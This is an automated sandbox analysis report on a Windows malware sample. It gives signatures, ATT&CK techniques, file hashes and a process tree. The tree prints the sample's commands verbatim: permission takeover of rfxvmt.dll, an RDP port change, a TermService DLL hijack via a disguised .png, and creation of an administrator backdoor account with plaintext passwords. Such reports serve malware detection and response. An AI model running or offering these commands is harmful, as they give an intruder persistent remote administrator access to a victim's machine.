668cb262f0e7473c0bd4b254463671acc74502e7e45a450ec5421a217cea3671

Analysis

max time kernel
139s
max time network
118s
platform
windows7_x64
resource
win7v20201028
submitted
12-11-2020 14:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

668cb262f0e7473c0bd4b254463671acc74502e7e45a450ec5421a217cea3671.exe
Size

3.1MB
MD5

7f18a2b5f73d5a3b257506d2a899409f
SHA1

07a521fdbd2c61aba059a7b4731658d9ea993d06
SHA256

668cb262f0e7473c0bd4b254463671acc74502e7e45a450ec5421a217cea3671
SHA512

e3260e9de862aeb3609db9488c0e34aa541f784e668085be8991d09e48a4659805953a8af0cdc4f975c8b55f37cac3f4b33b159ce9cd44f260f4c80ed0f0ea6b

Score

9^/10

discovery exploit persistence upx

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exe

pid process

852 icacls.exe
1708 icacls.exe
268 icacls.exe
1864 icacls.exe
636 icacls.exe
1576 icacls.exe
1580 takeown.exe
1648 icacls.exe
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

pid	process
852	icacls.exe
1708	icacls.exe
268	icacls.exe
1864	icacls.exe
636	icacls.exe
1576	icacls.exe
1580	takeown.exe
1648	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Loads dropped DLL 2 IoCs

Processes:

pid process

568
568
Modifies file permissions 1 TTPs 8 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

636 icacls.exe
1576 icacls.exe
1580 takeown.exe
1648 icacls.exe
852 icacls.exe
1708 icacls.exe
268 icacls.exe
1864 icacls.exe
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

pid	process
568
568

pid	process
636	icacls.exe
1576	icacls.exe
1580	takeown.exe
1648	icacls.exe
852	icacls.exe
1708	icacls.exe
268	icacls.exe
1864	icacls.exe

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Modifies service 2 TTPs 2 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters	reg.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Drops file in Windows directory 8 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1008 reg.exe
Runs net.exe

pid	process
1008	reg.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1796	powershell.exe
1796	powershell.exe
568	powershell.exe
568	powershell.exe
972	powershell.exe
972	powershell.exe
1352	powershell.exe
1352	powershell.exe
1796	powershell.exe
1796	powershell.exe
1796	powershell.exe

Suspicious behavior: LoadsDriver 5 IoCs

Processes:

pid process

460
568
568
568
568

pid	process
460
568
568
568
568

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeicacls.exe

description	pid	process
Token: SeDebugPrivilege	1796	powershell.exe
Token: SeDebugPrivilege	568	powershell.exe
Token: SeDebugPrivilege	972	powershell.exe
Token: SeDebugPrivilege	1352	powershell.exe
Token: SeRestorePrivilege	852	icacls.exe

Suspicious use of WriteProcessMemory 130 IoCs

Processes:

668cb262f0e7473c0bd4b254463671acc74502e7e45a450ec5421a217cea3671.exepowershell.execsc.exenet.execmd.exe

description	pid	process	target process
PID 288 wrote to memory of 1796	288	668cb262f0e7473c0bd4b254463671acc74502e7e45a450ec5421a217cea3671.exe	powershell.exe
PID 288 wrote to memory of 1796	288	668cb262f0e7473c0bd4b254463671acc74502e7e45a450ec5421a217cea3671.exe	powershell.exe
PID 288 wrote to memory of 1796	288	668cb262f0e7473c0bd4b254463671acc74502e7e45a450ec5421a217cea3671.exe	powershell.exe
PID 288 wrote to memory of 1796	288	668cb262f0e7473c0bd4b254463671acc74502e7e45a450ec5421a217cea3671.exe	powershell.exe
PID 1796 wrote to memory of 1564	1796	powershell.exe	csc.exe
PID 1796 wrote to memory of 1564	1796	powershell.exe	csc.exe
PID 1796 wrote to memory of 1564	1796	powershell.exe	csc.exe
PID 1564 wrote to memory of 324	1564	csc.exe	cvtres.exe
PID 1564 wrote to memory of 324	1564	csc.exe	cvtres.exe
PID 1564 wrote to memory of 324	1564	csc.exe	cvtres.exe
PID 1796 wrote to memory of 568	1796	powershell.exe	powershell.exe
PID 1796 wrote to memory of 568	1796	powershell.exe	powershell.exe
PID 1796 wrote to memory of 568	1796	powershell.exe	powershell.exe
PID 1796 wrote to memory of 972	1796	powershell.exe	powershell.exe
PID 1796 wrote to memory of 972	1796	powershell.exe	powershell.exe
PID 1796 wrote to memory of 972	1796	powershell.exe	powershell.exe
PID 1796 wrote to memory of 1352	1796	powershell.exe	powershell.exe
PID 1796 wrote to memory of 1352	1796	powershell.exe	powershell.exe
PID 1796 wrote to memory of 1352	1796	powershell.exe	powershell.exe
PID 1796 wrote to memory of 1580	1796	powershell.exe	takeown.exe
PID 1796 wrote to memory of 1580	1796	powershell.exe	takeown.exe
PID 1796 wrote to memory of 1580	1796	powershell.exe	takeown.exe
PID 1796 wrote to memory of 1648	1796	powershell.exe	icacls.exe
PID 1796 wrote to memory of 1648	1796	powershell.exe	icacls.exe
PID 1796 wrote to memory of 1648	1796	powershell.exe	icacls.exe
PID 1796 wrote to memory of 852	1796	powershell.exe	icacls.exe
PID 1796 wrote to memory of 852	1796	powershell.exe	icacls.exe
PID 1796 wrote to memory of 852	1796	powershell.exe	icacls.exe
PID 1796 wrote to memory of 1708	1796	powershell.exe	icacls.exe
PID 1796 wrote to memory of 1708	1796	powershell.exe	icacls.exe
PID 1796 wrote to memory of 1708	1796	powershell.exe	icacls.exe
PID 1796 wrote to memory of 268	1796	powershell.exe	icacls.exe
PID 1796 wrote to memory of 268	1796	powershell.exe	icacls.exe
PID 1796 wrote to memory of 268	1796	powershell.exe	icacls.exe
PID 1796 wrote to memory of 1864	1796	powershell.exe	icacls.exe
PID 1796 wrote to memory of 1864	1796	powershell.exe	icacls.exe
PID 1796 wrote to memory of 1864	1796	powershell.exe	icacls.exe
PID 1796 wrote to memory of 636	1796	powershell.exe	icacls.exe
PID 1796 wrote to memory of 636	1796	powershell.exe	icacls.exe
PID 1796 wrote to memory of 636	1796	powershell.exe	icacls.exe
PID 1796 wrote to memory of 1576	1796	powershell.exe	icacls.exe
PID 1796 wrote to memory of 1576	1796	powershell.exe	icacls.exe
PID 1796 wrote to memory of 1576	1796	powershell.exe	icacls.exe
PID 1796 wrote to memory of 324	1796	powershell.exe	reg.exe
PID 1796 wrote to memory of 324	1796	powershell.exe	reg.exe
PID 1796 wrote to memory of 324	1796	powershell.exe	reg.exe
PID 1796 wrote to memory of 1008	1796	powershell.exe	reg.exe
PID 1796 wrote to memory of 1008	1796	powershell.exe	reg.exe
PID 1796 wrote to memory of 1008	1796	powershell.exe	reg.exe
PID 1796 wrote to memory of 1988	1796	powershell.exe	reg.exe
PID 1796 wrote to memory of 1988	1796	powershell.exe	reg.exe
PID 1796 wrote to memory of 1988	1796	powershell.exe	reg.exe
PID 1796 wrote to memory of 1000	1796	powershell.exe	net.exe
PID 1796 wrote to memory of 1000	1796	powershell.exe	net.exe
PID 1796 wrote to memory of 1000	1796	powershell.exe	net.exe
PID 1000 wrote to memory of 1592	1000	net.exe	net1.exe
PID 1000 wrote to memory of 1592	1000	net.exe	net1.exe
PID 1000 wrote to memory of 1592	1000	net.exe	net1.exe
PID 1796 wrote to memory of 920	1796	powershell.exe	cmd.exe
PID 1796 wrote to memory of 920	1796	powershell.exe	cmd.exe
PID 1796 wrote to memory of 920	1796	powershell.exe	cmd.exe
PID 920 wrote to memory of 680	920	cmd.exe	cmd.exe
PID 920 wrote to memory of 680	920	cmd.exe	cmd.exe
PID 920 wrote to memory of 680	920	cmd.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\668cb262f0e7473c0bd4b254463671acc74502e7e45a450ec5421a217cea3671.exe
"C:\Users\Admin\AppData\Local\Temp\668cb262f0e7473c0bd4b254463671acc74502e7e45a450ec5421a217cea3671.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:288

\??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
-ep bypass -noexit -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1796

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\whondavr\whondavr.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:1564

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES589B.tmp" "c:\Users\Admin\AppData\Local\Temp\whondavr\CSCE37644D5932041E68775792EB5F66E5D.TMP"
4⤵
PID:324

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:972

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1352

C:\Windows\system32\takeown.exe
"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1580

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1648

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:852

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1708

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:268

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1864

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:636

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1576

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:324

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Modifies service
- Modifies registry key
PID:1008

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
PID:1988

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
- Suspicious use of WriteProcessMemory
PID:1000

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
PID:1592

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
- Suspicious use of WriteProcessMemory
PID:920

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
4⤵
PID:680

C:\Windows\system32\net.exe
net start rdpdr
5⤵
PID:1556

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
PID:792

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
PID:1660

C:\Windows\system32\cmd.exe
cmd /c net start TermService
4⤵
PID:1780

C:\Windows\system32\net.exe
net start TermService
5⤵
PID:1204

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
6⤵
PID:1668

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
PID:1504

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
PID:908

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
PID:1664

C:\Windows\system32\net.exe
net.exe user wgautilacc Ghar4f5 /del
2⤵
PID:788

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
3⤵
PID:1520

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc HA5lBj6A /add
1⤵
PID:1752

C:\Windows\system32\net.exe
net.exe user wgautilacc HA5lBj6A /add
2⤵
PID:1764

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc HA5lBj6A /add
3⤵
PID:1928

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
PID:1672

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
2⤵
PID:112

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
3⤵
PID:1504

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD
1⤵
PID:1032

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD
2⤵
PID:1552

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD
3⤵
PID:920

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
PID:972

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" wgautilacc /ADD
2⤵
PID:268

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
3⤵
PID:788

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc HA5lBj6A
1⤵
PID:1520

C:\Windows\system32\net.exe
net.exe user wgautilacc HA5lBj6A
2⤵
PID:1728

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc HA5lBj6A
3⤵
PID:1764

C:\Windows\System32\cmd.exe
cmd.exe /C net user wgautilacc 1234
1⤵
PID:768

C:\Windows\system32\net.exe
net user wgautilacc 1234
2⤵
PID:920

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc 1234
3⤵
PID:1320

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

File Permissions Modification

T1222

Credential Access

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_387ba5ce-a1c0-4183-b302-1a91665eb3d1
MD5
faa37917b36371249ac9fcf93317bf97

SHA1
a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4

SHA256
b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132

SHA512
614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_44e1d2f0-4c9d-4718-9737-f8deb2d72ad8
MD5
d89968acfbd0cd60b51df04860d99896

SHA1
b3c29916ccb81ce98f95bbf3aa8a73de16298b29

SHA256
1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

SHA512
b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7131e397-2b15-4537-8a4f-1319bab4dc3a
MD5
a70ee38af4bb2b5ed3eeb7cbd1a12fa3

SHA1
81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

SHA256
dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

SHA512
8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bcdac2be-321b-4c5e-b153-f4655deddb10
MD5
faa37917b36371249ac9fcf93317bf97

SHA1
a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4

SHA256
b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132

SHA512
614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_cdbc0d45-4d1d-48d7-a06d-09d8dfed08ee
MD5
7f79b990cb5ed648f9e583fe35527aa7

SHA1
71b177b48c8bd745ef02c2affad79ca222da7c33

SHA256
080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

SHA512
20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d3c61789-a368-49e7-bd53-0d28079dde34
MD5
2d5cd190b5db0620cd62e3cd6ba1dcd3

SHA1
ff4f229f4fbacccdf11d98c04ba756bda80aac7a

SHA256
ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d

SHA512
edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e29ec5ac-92c2-4804-b4a5-0ca10f619bda
MD5
e5b3ba61c3cf07deda462c9b27eb4166

SHA1
b324dad73048be6e27467315f82b7a5c1438a1f9

SHA256
b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925

SHA512
a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fcc698a3-5834-4192-8e11-8b08d3d5fb2e
MD5
6f0d509e28be1af95ba237d4f43adab4

SHA1
c665febe79e435843553bee86a6cea731ce6c5e4

SHA256
f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e

SHA512
8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
4aeadc35176a8c132c358c56c241dd4b

SHA1
f296a2f49437e950d4218c4091237fad6162459d

SHA256
6a30a65ba83e6ca57820883fd7bf9bb710f1152b30b4649a85e3339be106ed9b

SHA512
b6ca76889b5134e456718eedf1b91a24620c069a67c1f47275aa7602c5b8e3aac442fd5711221e8e12c1c2259f18aa27679941318a07345fe26e84114def6210

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
63c5570b0e315cc99115626bdb8925aa

SHA1
e546b00c77eb89b307d75dfdf571a7ff569e5fbf

SHA256
992662947991f72e830e117bb9f7b843edfcc2d0b36291c61f430887eb6f4ac3

SHA512
1811f9fe189c293f295b53161151cf257633f37dc3509cc9e601f135ca56b6fb8062031dc75590b8ee0638ad1141b1aa237db4e2a80d121efe979cdb2bf6b740

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
d81f4dcef2c4f1f8b33e1b03bb307f1c

SHA1
b05f59c9693716f4f16651610287934a1bfaf1b9

SHA256
71b3b08db1842ad3133265bfb1e9c780ed63b44159269153a0caa0c6d623c160

SHA512
7de2688881c3caed07396fcef38b9c88dbbae5c70f1a4b8ece0a08cee2eac8f2b2b26b6a4f22584b8ae1591f29128c8f763691306d2c6bebf56f8df5846b330b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
e1b8441e8f52def962fae2ff13b4ad8f

SHA1
9175dbfa1afa8e2c6d1a9f74de71c8f814cc6c82

SHA256
57f5bfe7f6f93acd9aa7b817e7c7f78fc117ce1c6de20f4020af5650863efea0

SHA512
a4a3c895ed3bb0edbb76b7c10a591e466451b732a5cc97a3c184b134ea668a6710d73ab6bd0758b3bebb780990f66791c0b01bce11914d6d76bc9860427e2cae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
ee1b9121224aa6f4ca65af3aa0a6a977

SHA1
52689e959ec81d2b69750df61ded2bceb9b9258f

SHA256
e5d2b430f55081c8b31089eea6a6fca1ad5c2522062e1085cdcc240d04ee99bb

SHA512
75180841e6b56fa6ec0f83f7d21ddca17313330586c73c4bd0f54ca7b9d01bbe1d57f5e0d51fb183820ba273f378acfcde2513f04801d717185a61f5f9b1efec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
e52c0fd4fd2df154dac69ca3c74b1534

SHA1
3efbe846ce18b15632829d145d741808a35fc3af

SHA256
7187ef9cb55b1e3fd9eb94e218a25faf217ea0791436d15ea63b33f6b3e41c2c

SHA512
df6e68d0cd8b65b1367e52e0df406d483c46dca30305115388b4708cd6eb2d91e6d64311b3fdd93519c2d75e9a0915fc0fe1ac58d0098d0fcd36841e8bd5b5c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES589B.tmp
MD5
3b0b12a1171ec7fd3695a7299fea7f66

SHA1
594d73ea1840389e57df0c0e55c66afdd6728938

SHA256
4992ecfe2e701f5adca2295a147af49f5bbf9a3482254a3bf2e48b38ed0343c5

SHA512
ca5a692d9f879f5b4c76be6e994adb096037cf81d7140a0d435b07253a22e99519d85f6f23395cf68f0f3b6f789f361de56f62fc1223971603a04518f7317e04

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.ps1
MD5
41d1a9d1cbee90f1e5f27fdfb299f8b8

SHA1
1e9ac27006a7c364649265246fccbd719418ceab

SHA256
0f6c089b4cefa4a454150f08519573283b1a38e2c19cd7b04855a05d686d41b4

SHA512
f178f88d0491cf72c3d4d591ab1d428691474a4c443822a0d270555c9dc4d05932057847b0e7106d564e6c9ddb33c0649e472258afca10696edc3dbb00f33422

Download Submit
C:\Users\Admin\AppData\Local\Temp\whondavr\whondavr.dll
MD5
3e06de786aae40496cc7935b58627caa

SHA1
0792603999d98c758a6404d15d77b0f360892a18

SHA256
382ca467dd5494ae3a3013002a80de679db0de73a37eaa412df64a764fa70be8

SHA512
6069cbea81591093619da292e8763ffc18349fe6f3dcaadfeed1ee041178d02d59cbc29666b3e444165893123d7426acc4d2ad8632407a9b90e0d40f48c1c00a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
aa210f81dfeadc9e9821973edcb0474b

SHA1
607a3c1a1bfecd5b1f5bf79bbbcab894258c5dc8

SHA256
10083ebc53c1a5ca59057f37fcd9882876bf68e0cfef836d1e64ab6114ae5e97

SHA512
0c7845c235fcbecba1b2ef5c01765fcdd050cb37c820c3591fa9084ce68daceaf346da08e25d808abe598ce8fd843642afa770df2f085a86c6596c98377e1bb2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
aa210f81dfeadc9e9821973edcb0474b

SHA1
607a3c1a1bfecd5b1f5bf79bbbcab894258c5dc8

SHA256
10083ebc53c1a5ca59057f37fcd9882876bf68e0cfef836d1e64ab6114ae5e97

SHA512
0c7845c235fcbecba1b2ef5c01765fcdd050cb37c820c3591fa9084ce68daceaf346da08e25d808abe598ce8fd843642afa770df2f085a86c6596c98377e1bb2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
aa210f81dfeadc9e9821973edcb0474b

SHA1
607a3c1a1bfecd5b1f5bf79bbbcab894258c5dc8

SHA256
10083ebc53c1a5ca59057f37fcd9882876bf68e0cfef836d1e64ab6114ae5e97

SHA512
0c7845c235fcbecba1b2ef5c01765fcdd050cb37c820c3591fa9084ce68daceaf346da08e25d808abe598ce8fd843642afa770df2f085a86c6596c98377e1bb2

Download Submit
C:\Windows\system32\rfxvmt.dll
MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\samr
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\samr
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\samr
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
